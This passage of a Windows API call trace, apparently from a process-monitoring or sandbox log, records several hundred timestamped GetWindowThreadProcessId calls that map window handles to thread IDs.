	[0854.320] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1578
	[0854.320] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x16c0
	[0854.320] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x161c
	[0854.320] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1638
	[0854.320] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x15c8
	[0854.320] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1554
	[0854.320] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1674
	[0854.321] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1520
	[0854.321] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x14bc
	[0854.321] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xf8c
	[0854.321] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe9c
	[0854.321] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1434
	[0854.322] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x14ec
	[0854.322] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xfcc
	[0854.322] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x12ac
	[0854.323] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1484
	[0854.323] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x934
	[0854.323] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xc0c
	[0854.323] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xb08
	[0854.323] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x948
	[0854.323] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1178
	[0854.323] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x13e0
	[0854.323] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xcd0
	[0854.323] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x13fc
	[0854.324] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xdc8
	[0854.324] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xc18
	[0854.324] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xc2c
	[0854.324] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xa1c
	[0854.324] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1244
	[0854.324] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xdb0
	[0854.324] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1398
	[0854.324] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1358
	[0854.325] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1370
	[0854.325] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1340
	[0854.325] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x130c
	[0854.325] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x12c0
	[0854.325] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x12e4
	[0854.325] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1270
	[0854.325] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1298
	[0854.325] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x120c
	[0854.325] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x122c
	[0854.326] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x11c4
	[0854.326] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x11b0
	[0854.326] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1188
	[0854.326] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1148
	[0854.326] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1160
	[0854.326] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x10fc
	[0854.326] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe34
	[0854.326] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xea4
	[0854.327] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x514
	[0854.327] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe48
	[0854.327] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xbc8
	[0854.327] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xdf8
	[0854.327] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x318
	[0854.327] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xcac
	[0854.327] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x8bc
	[0854.327] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xf9c
	[0854.327] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xf48
	[0854.328] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe40
	[0854.328] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xecc
	[0854.328] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xeb8
	[0854.328] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe80
	[0854.328] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe98
	[0854.328] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe60
	[0854.328] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xee4
	[0854.328] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xf00
	[0854.329] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xdf0
	[0854.329] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xe1c
	[0854.329] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xdd0
	[0854.329] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xd94
	[0854.329] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xd74
	[0854.329] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xd00
	[0854.329] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xcd8
	[0854.329] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xc84
	[0854.330] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xca4
	[0854.330] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xc64
	[0854.330] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xc24
	[0854.330] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xb84
	[0854.330] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xbac
	[0854.330] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x384
	[0854.330] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xab8
	[0854.330] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x33c
	[0854.330] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xa44
	[0854.331] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xa64
	[0854.331] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x8a8
	[0854.331] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xaf0
	[0854.331] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x88c
	[0854.331] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xb04
	[0854.331] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x910
	[0854.331] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x230
	[0854.331] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xac0
	[0854.332] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xab4
	[0854.332] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xaac
	[0854.332] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x3d0
	[0854.332] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x978
	[0854.332] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xa7c
	[0854.332] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x59c
	[0854.332] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xa88
	[0854.332] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xa6c
	[0854.332] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xa68
	[0854.333] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x9f8
	[0854.333] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xa04
	[0854.333] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x924
	[0854.333] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x8dc
	[0854.333] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x7dc
	[0854.333] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x768
	[0854.333] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x764
	[0854.333] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x820
	[0854.334] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x810
	[0854.334] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x794
	[0854.334] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x83c
	[0854.334] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x7ac
	[0854.334] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xb44
	[0854.334] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x6bc
	[0854.334] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xb5c
	[0854.334] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x838
	[0854.334] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.335] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.335] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.335] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.335] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.335] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.335] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.335] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.335] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x818
	[0854.336] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x5b8
	[0854.336] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x494
	[0854.336] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1ec
	[0854.336] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x440
	[0854.336] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x7e8
	[0854.336] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x730
	[0854.336] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x2c8
	[0854.336] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x31c
	[0854.337] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x330
	[0854.337] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x128
	[0854.337] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x5c8
	[0855.362] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x6f8
	[0855.362] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x358
	[0855.362] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x73c
	[0855.362] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xb0
	[0855.362] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x250
	[0855.362] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x240
	[0855.362] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x790
	[0855.362] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x61c
	[0855.362] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x540
	[0855.362] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x538
	[0855.363] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x568
	[0855.363] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x538
	[0855.363] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x568
	[0855.363] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x538
	[0855.363] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x540
	[0855.363] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x540
	[0855.363] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x57c
	[0855.363] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x460
	[0855.363] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x554
	[0855.363] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0855.364] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x528
	[0855.364] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0855.364] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0855.364] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0855.364] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x79c
	[0855.364] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0855.364] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4e0
	[0855.364] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0855.364] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x460
	[0855.364] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x460
	[0855.364] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x44c
	[0855.365] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x778
	[0855.365] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x460
	[0855.365] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x558
	[0855.365] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0855.365] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0855.365] GetWindowThreadProcessId (in: hWnd=0x10b64, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x2254
	[0855.365] GetWindowThreadProcessId (in: hWnd=0x10b60, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x2250
	[0855.365] GetWindowThreadProcessId (in: hWnd=0x10b54, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x16f0
	[0855.366] GetWindowThreadProcessId (in: hWnd=0x10b48, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1338
	[0855.366] GetWindowThreadProcessId (in: hWnd=0x10b3e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1ca0
	[0855.366] GetWindowThreadProcessId (in: hWnd=0x10b34, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x238c
	[0855.366] GetWindowThreadProcessId (in: hWnd=0x10b2a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1b08
	[0855.366] GetWindowThreadProcessId (in: hWnd=0x10b0e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1a8c
	[0855.366] GetWindowThreadProcessId (in: hWnd=0x10af8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x18e0
	[0855.366] GetWindowThreadProcessId (in: hWnd=0x10aec, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x2344
	[0855.366] GetWindowThreadProcessId (in: hWnd=0x10ae0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1d8c
	[0855.366] GetWindowThreadProcessId (in: hWnd=0x10ad4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1038
	[0855.367] GetWindowThreadProcessId (in: hWnd=0x10ad0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1a58
	[0855.367] GetWindowThreadProcessId (in: hWnd=0x10acc, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1c7c
	[0855.367] GetWindowThreadProcessId (in: hWnd=0x10ac6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1f04
	[0855.367] GetWindowThreadProcessId (in: hWnd=0x10ac2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x18b8
	[0855.367] GetWindowThreadProcessId (in: hWnd=0x40278, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x22c8
	[0855.367] GetWindowThreadProcessId (in: hWnd=0x10abe, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x21b8
	[0855.367] GetWindowThreadProcessId (in: hWnd=0x20958, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x21c0
	[0855.367] GetWindowThreadProcessId (in: hWnd=0x10a7a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x219c
